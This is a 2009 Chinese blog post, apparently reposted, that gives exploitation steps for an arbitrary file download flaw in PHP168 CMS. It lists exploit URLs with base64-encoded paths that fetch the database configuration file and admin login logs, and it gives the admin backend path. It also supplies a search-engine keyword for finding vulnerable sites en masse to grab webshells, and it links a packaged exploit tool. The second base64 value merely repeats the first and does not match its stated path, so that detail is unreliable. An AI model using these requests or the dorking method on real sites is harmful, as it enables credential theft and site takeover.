PHP168下载任意文件漏洞+漏洞利用工具

2009年11月24日星期二 | | |

作者:neeao

首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!
这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,以下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

程序后台:http://dabei.org/admin/index.php?iframe=1

Base64加密代码:

http://dabei.org//cache/adminlogin_logs.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

http://dabei.org//php168 /mysql_config.php == "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

批量抓webshell:
google,baidu 输入关键字:Powered by PHP168

 

漏洞利用工具作者:陆羽

php168_下载任意文件漏洞利用工具.rar

From: http://www.sai52.com/archives/381/
我的QQ空间
kmeleon.js及pref.js配置解释
K-MeleonCCF ME目录下的defaults\pref\kmeleon.js保存了K-Meleon...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]